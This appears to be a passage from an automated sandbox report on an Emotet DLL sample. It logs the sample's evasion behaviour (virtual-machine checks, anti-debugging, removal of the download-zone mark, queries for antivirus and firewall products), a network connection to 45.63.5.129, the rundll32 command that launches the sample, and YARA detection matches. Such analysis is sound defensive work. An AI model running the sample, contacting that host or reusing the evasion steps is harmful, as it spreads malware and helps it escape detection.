                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582894630.0000000000559000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582878740.0000000000559000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000016.00000003.582894630.0000000000559000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582878740.0000000000559000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000016.00000003.583003342.0000000000553000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582874162.0000000000553000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582869667.000000000054D000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.583186515.000000000054D000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.604642586.0000000000CAC000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.604322551.0000000000CAC000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000016.00000002.597098712.0000000000432000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000016.00000003.582869667.000000000054D000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.583186515.000000000054D000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.604642586.0000000000CAC000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.604322551.0000000000CAC000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011013E7 push esi; retf 2_2_011013F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECF6A93 push ecx; ret 2_2_6ECF6AA6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008613E7 push esi; retf 5_2_008613F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECF6A93 push ecx; ret 5_2_6ECF6AA6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007713E7 push esi; retf 6_2_007713F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A13E7 push esi; retf 13_2_035A13F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A13E7 push esi; retf 26_2_009A13F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECDE690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,2_2_6ECDE690
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Bbinmhqtvqxlwm\fxpdqqlt.peeJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Bbinmhqtvqxlwm\fxpdqqlt.pee:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\svchost.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 4736Thread sleep time: -90000s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECF0927 FindFirstFileExW,2_2_6ECF0927
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECF0927 FindFirstFileExW,5_2_6ECF0927
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BE2C8 FindFirstFileW,26_2_009BE2C8
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: Amcache.hve.22.drBinary or memory string: VMware
                      Source: Amcache.hve.22.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: WerFault.exe, 00000018.00000003.618456915.0000000004C00000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000002.620041748.0000000004C02000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWiK
                      Source: Amcache.hve.22.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.22.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.22.drBinary or memory string: VMware, Inc.
                      Source: WerFault.exe, 00000018.00000002.620008004.0000000004BD2000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.618494839.0000000004BD2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0
                      Source: svchost.exe, 0000001C.00000002.693021814.00000214D4681000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWpj
                      Source: Amcache.hve.22.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                      Source: Amcache.hve.22.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.22.drBinary or memory string: VMware7,1
                      Source: Amcache.hve.22.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.22.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.22.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: WerFault.exe, 00000018.00000003.618456915.0000000004C00000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000002.620041748.0000000004C02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.693041446.00000214D4689000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.693406330.00000214D46EB000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.22.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.22.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.22.drBinary or memory string: VMware, Inc.me
                      Source: Amcache.hve.22.drBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
                      Source: Amcache.hve.22.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: WerFault.exe, 00000018.00000003.616852484.0000000004BD1000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: Amcache.hve.22.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECEAB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6ECEAB0C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECDE690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,2_2_6ECDE690
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECD1290 GetMagnificationLensCtxInformation,GetProcessHeap,GetMagnificationLensCtxInformation,HeapAlloc,HeapFree,2_2_6ECD1290
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011107D2 mov eax, dword ptr fs:[00000030h]2_2_011107D2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECE9990 mov eax, dword ptr fs:[00000030h]2_2_6ECE9990
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECEEC0B mov ecx, dword ptr fs:[00000030h]2_2_6ECEEC0B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECF02CC mov eax, dword ptr fs:[00000030h]2_2_6ECF02CC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECE9920 mov esi, dword ptr fs:[00000030h]2_2_6ECE9920
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECE9920 mov eax, dword ptr fs:[00000030h]2_2_6ECE9920
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008707D2 mov eax, dword ptr fs:[00000030h]5_2_008707D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECE9990 mov eax, dword ptr fs:[00000030h]5_2_6ECE9990
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECEEC0B mov ecx, dword ptr fs:[00000030h]5_2_6ECEEC0B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECF02CC mov eax, dword ptr fs:[00000030h]5_2_6ECF02CC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECE9920 mov esi, dword ptr fs:[00000030h]5_2_6ECE9920
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECE9920 mov eax, dword ptr fs:[00000030h]5_2_6ECE9920
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007807D2 mov eax, dword ptr fs:[00000030h]6_2_007807D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B07D2 mov eax, dword ptr fs:[00000030h]13_2_035B07D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B07D2 mov eax, dword ptr fs:[00000030h]26_2_009B07D2
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01111591 LdrInitializeThunk,2_2_01111591
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECEA462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6ECEA462
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECEAB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6ECEAB0C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECF0326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6ECF0326
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECEA462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_6ECEA462
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECEAB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_6ECEAB0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECF0326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_6ECF0326

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.63.5.129 187Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 168 -p 6404 -ip 6404Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 308Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6404 -ip 6404Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 316Jump to behavior
                      Source: svchost.exe, 00000001.00000002.814657339.00000159B5A60000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.569777163.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.600588969.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.599262292.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.578206765.0000000001820000.00000002.00020000.sdmp, rundll32.exe, 0000001A.00000002.816539313.0000000003450000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: svchost.exe, 00000001.00000002.814657339.00000159B5A60000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.569777163.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.600588969.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.599262292.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.578206765.0000000001820000.00000002.00020000.sdmp, rundll32.exe, 0000001A.00000002.816539313.0000000003450000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: svchost.exe, 00000001.00000002.814657339.00000159B5A60000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.569777163.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.600588969.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.599262292.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.578206765.0000000001820000.00000002.00020000.sdmp, rundll32.exe, 0000001A.00000002.816539313.0000000003450000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: svchost.exe, 00000001.00000002.814657339.00000159B5A60000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.569777163.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.600588969.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.599262292.0000000001820000.00000002.00020000.sdmp, loaddll32.exe, 00000002.00000000.578206765.0000000001820000.00000002.00020000.sdmp, rundll32.exe, 0000001A.00000002.816539313.0000000003450000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECEA584 cpuid 2_2_6ECEA584
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECEA755 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_6ECEA755

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: Amcache.hve.LOG1.22.dr, Amcache.hve.22.drBinary or memory string: c:\users\user\desktop\procexp.exe
                      Source: Amcache.hve.22.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: svchost.exe, 00000000.00000002.813823605.0000020AC5040000.00000004.00000001.sdmpBinary or memory string: ,@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: svchost.exe, 00000000.00000002.813897976.0000020AC5102000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: Amcache.hve.LOG1.22.dr, Amcache.hve.22.drBinary or memory string: procexp.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 13.2.rundll32.exe.3332418.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.770000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.860000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.e12148.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.1100000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.c920a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.c30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.e12148.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.11e3b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.c50000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.c920a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.932160.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.35a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.rundll32.exe.9a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.11e3b40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.rundll32.exe.9a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.c30000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.35a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.770000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.3332418.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.1100000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.860000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.932160.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.c50000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.562952810.0000000000DFA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.620708124.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.572742527.0000000000C30000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.600312961.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.574084916.0000000000C7A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.577604622.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
